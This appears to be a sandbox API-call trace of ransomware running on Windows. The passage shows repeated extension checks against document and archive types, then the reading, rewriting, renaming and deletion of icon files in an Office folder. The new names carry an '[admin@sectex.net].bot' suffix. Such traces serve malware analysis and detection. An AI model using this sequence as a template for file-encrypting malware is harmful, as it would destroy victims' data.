	[0171.103] lstrlenW (lpString=".pdf") returned 4
	[0171.103] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.103] lstrlenW (lpString=".xls") returned 4
	[0171.103] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.103] lstrlenW (lpString=".xlsx") returned 5
	[0171.103] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1
	[0171.103] lstrlenW (lpString=".ppt") returned 4
	[0171.103] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.103] lstrlenW (lpString=".zip") returned 4
	[0171.103] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.103] lstrlenW (lpString=".rar") returned 4
	[0171.103] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.103] lstrlenW (lpString=".bz2") returned 4
	[0171.103] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.103] lstrlenW (lpString=".7z") returned 3
	[0171.103] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.103] lstrlenW (lpString=".dbf") returned 4
	[0171.103] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.103] lstrlenW (lpString=".1cd") returned 4
	[0171.103] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".jpg") returned 4
	[0171.104] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".doc") returned 4
	[0171.104] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.104] lstrlenW (lpString=".docx") returned 5
	[0171.104] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1
	[0171.104] lstrlenW (lpString=".pdf") returned 4
	[0171.104] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString=".xls") returned 4
	[0171.104] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString=".xlsx") returned 5
	[0171.104] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1
	[0171.104] lstrlenW (lpString=".ppt") returned 4
	[0171.104] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".zip") returned 4
	[0171.104] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString=".rar") returned 4
	[0171.104] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.104] lstrlenW (lpString=".bz2") returned 4
	[0171.104] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.104] lstrlenW (lpString=".7z") returned 3
	[0171.104] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".dbf") returned 4
	[0171.104] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".1cd") returned 4
	[0171.104] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.104] lstrlenW (lpString=".jpg") returned 4
	[0171.104] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.105] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.105] lstrlenW (lpString="GWE.ICO") returned 7
	[0171.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.147] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=169181) returned 1
	[0171.169] CloseHandle (hObject=0x354) returned 1
	[0171.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico")) returned 0x20
	[0171.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.169] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.169] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.170] GetLastError () returned 0x0
	[0171.170] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x294dd, lpOverlapped=0x0) returned 1
	[0171.195] WriteFile (in: hFile=0x124, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x294e0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x294e0, lpOverlapped=0x0) returned 1
	[0171.198] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.198] WriteFile (in: hFile=0x124, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0171.198] SetEndOfFile (hFile=0x124) returned 1
	[0171.198] CloseHandle (hObject=0x124) returned 1
	[0171.198] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.198] SetEndOfFile (hFile=0x354) returned 1
	[0171.202] CloseHandle (hObject=0x354) returned 1
	[0171.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gwe.ico")) returned 1
	[0171.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.491] lstrlenW (lpString=".doc") returned 4
	[0171.491] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.491] lstrlenW (lpString=".docx") returned 5
	[0171.491] lstrcmpiW (lpString1=".docx", lpString2="E.ICO") returned -1
	[0171.491] lstrlenW (lpString=".pdf") returned 4
	[0171.491] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.491] lstrlenW (lpString=".xls") returned 4
	[0171.491] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.491] lstrlenW (lpString=".xlsx") returned 5
	[0171.491] lstrcmpiW (lpString1=".xlsx", lpString2="E.ICO") returned -1
	[0171.491] lstrlenW (lpString=".ppt") returned 4
	[0171.492] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString=".zip") returned 4
	[0171.492] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString=".rar") returned 4
	[0171.492] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString=".bz2") returned 4
	[0171.492] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.492] lstrlenW (lpString=".7z") returned 3
	[0171.492] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString=".dbf") returned 4
	[0171.492] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString=".1cd") returned 4
	[0171.492] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString=".jpg") returned 4
	[0171.492] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.492] lstrlenW (lpString=".doc") returned 4
	[0171.492] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.492] lstrlenW (lpString=".docx") returned 5
	[0171.492] lstrcmpiW (lpString1=".docx", lpString2="E.ICO") returned -1
	[0171.492] lstrlenW (lpString=".pdf") returned 4
	[0171.492] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString=".xls") returned 4
	[0171.492] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.492] lstrlenW (lpString=".xlsx") returned 5
	[0171.492] lstrcmpiW (lpString1=".xlsx", lpString2="E.ICO") returned -1
	[0171.492] lstrlenW (lpString=".ppt") returned 4
	[0171.493] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.493] lstrlenW (lpString=".zip") returned 4
	[0171.493] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.493] lstrlenW (lpString=".rar") returned 4
	[0171.493] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.493] lstrlenW (lpString=".bz2") returned 4
	[0171.493] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.493] lstrlenW (lpString=".7z") returned 3
	[0171.493] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.493] lstrlenW (lpString=".dbf") returned 4
	[0171.493] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.493] lstrlenW (lpString=".1cd") returned 4
	[0171.493] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\GWE.ICO") returned 67
	[0171.493] lstrlenW (lpString=".jpg") returned 4
	[0171.493] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.493] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.493] lstrlenW (lpString="MANUAL.ICO") returned 10
	[0171.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.663] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=318) returned 1
	[0171.663] CloseHandle (hObject=0x354) returned 1
	[0171.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico")) returned 0x20
	[0171.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.664] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.664] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.665] GetLastError () returned 0x0
	[0171.665] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0171.666] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0171.667] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.667] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0171.667] SetEndOfFile (hFile=0x188) returned 1
	[0171.667] CloseHandle (hObject=0x188) returned 1
	[0171.667] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.667] SetEndOfFile (hFile=0x354) returned 1
	[0171.672] CloseHandle (hObject=0x354) returned 1
	[0171.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.672] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\manual.ico")) returned 1
	[0171.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.673] lstrlenW (lpString=".doc") returned 4
	[0171.673] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.673] lstrlenW (lpString=".docx") returned 5
	[0171.673] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0171.673] lstrlenW (lpString=".pdf") returned 4
	[0171.673] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.673] lstrlenW (lpString=".xls") returned 4
	[0171.673] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.673] lstrlenW (lpString=".xlsx") returned 5
	[0171.673] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0171.673] lstrlenW (lpString=".ppt") returned 4
	[0171.673] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.673] lstrlenW (lpString=".zip") returned 4
	[0171.673] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.673] lstrlenW (lpString=".rar") returned 4
	[0171.674] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.674] lstrlenW (lpString=".bz2") returned 4
	[0171.674] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.674] lstrlenW (lpString=".7z") returned 3
	[0171.674] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString=".dbf") returned 4
	[0171.674] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString=".1cd") returned 4
	[0171.674] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString=".jpg") returned 4
	[0171.674] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString=".doc") returned 4
	[0171.674] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.674] lstrlenW (lpString=".docx") returned 5
	[0171.674] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0171.674] lstrlenW (lpString=".pdf") returned 4
	[0171.674] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.674] lstrlenW (lpString=".xls") returned 4
	[0171.674] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.674] lstrlenW (lpString=".xlsx") returned 5
	[0171.674] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0171.674] lstrlenW (lpString=".ppt") returned 4
	[0171.674] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.674] lstrlenW (lpString=".zip") returned 4
	[0171.675] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.675] lstrlenW (lpString=".rar") returned 4
	[0171.675] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.675] lstrlenW (lpString=".bz2") returned 4
	[0171.675] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.675] lstrlenW (lpString=".7z") returned 3
	[0171.675] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.675] lstrlenW (lpString=".dbf") returned 4
	[0171.675] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.675] lstrlenW (lpString=".1cd") returned 4
	[0171.675] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MANUAL.ICO") returned 70
	[0171.675] lstrlenW (lpString=".jpg") returned 4
	[0171.675] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.675] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.675] lstrlenW (lpString="messageboxalert.ico") returned 19
	[0171.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.676] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2862) returned 1
	[0171.676] CloseHandle (hObject=0x354) returned 1
	[0171.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico")) returned 0x20
	[0171.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.677] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.677] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.678] GetLastError () returned 0x0
	[0171.678] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xb2e, lpOverlapped=0x0) returned 1
	[0171.680] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xb30, lpOverlapped=0x0) returned 1
	[0171.681] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.681] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0171.681] SetEndOfFile (hFile=0x188) returned 1
	[0171.681] CloseHandle (hObject=0x188) returned 1
	[0171.681] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.681] SetEndOfFile (hFile=0x354) returned 1
	[0171.684] CloseHandle (hObject=0x354) returned 1
	[0171.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxalert.ico")) returned 1
	[0171.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.685] lstrlenW (lpString=".doc") returned 4
	[0171.685] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.685] lstrlenW (lpString=".docx") returned 5
	[0171.685] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1
	[0171.685] lstrlenW (lpString=".pdf") returned 4
	[0171.685] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.685] lstrlenW (lpString=".xls") returned 4
